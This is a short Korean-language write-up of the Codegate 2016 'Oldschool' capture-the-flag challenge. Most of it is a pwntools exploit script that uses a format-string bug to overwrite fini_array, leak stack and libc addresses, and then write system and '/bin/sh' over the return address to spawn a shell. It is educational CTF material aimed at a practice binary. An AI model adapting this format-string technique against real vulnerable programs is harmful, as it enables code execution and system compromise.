Codegate 2016 Oldschool

main함수가 종료되고 참조하는 fini_array영역을 main함수 주소로 한번 더 덮어

1번째는 addr leak, 2번째는 ret_addr overwrite으로 exploit 했다.

leak된 addr들을 다시 포멧스트링으로 넣어주는 방법을 모르겠어서

binee님의 페이로드를 참고했다.

system_l = system & 0xffff

system_h = system >> 16

이런 방법으로 low_addr, high_addr를 나누어 넣어주면 된다.

from pwn import *
s = process('./oldschool')

payload += p32(0x80496dc)
payload += p32(0x80496de)
payload += 'stack: 0x%264$08x'
payload += 'libc: 0x%271$08x'
payload += '%2011c'
payload += '%7$hn'
payload += '%31906c'
payload += '%8$hn'
s.sendline(payload)

print s.recvuntil('stack: 0x')
leak_stack = int(s.recvline()[:-1],16)
print s.recvuntil('libc: 0x')
leak_libc = int(s.recvline()[:-1],16)
leak_libc = leak_libc - 243
libc_base = leak_libc - 104928
system = libc_base + 261744
binsh = libc_base + 0x15DA8C
log.info('stack : ' + hex(leak_stack))
log.info('libc : ' + hex(leak_libc))
log.info('base : ' + hex(libc_base))
log.info('system : ' + hex(system))
log.info('binsh : ' + hex(binsh))

system_l = system & 0xffff
system_h = system >> 16
binsh_l = binsh & 0xffff
binsh_h = binsh >> 16
ret_l = leak_stack - 0xe4
ret_h = ret_l + 2
 
payload = ''
payload += p32(ret_l)
payload += p32(ret_h)
payload += p32(ret_l+8)
payload += p32(ret_h+8)
 
payload += '%'+str(system_l - 16) + 'c'
payload += '%7$hn'
payload += '%' + str(system_h - system_l) + 'c'
payload += '%8$hn'
payload += '%' + str(binsh_l - system_h) + 'c'
payload += '%9$hn'
payload += '%' + str(binsh_h - binsh_l) + 'c'
payload += '%10$hn'

s.sendline(payload)
s.interactive()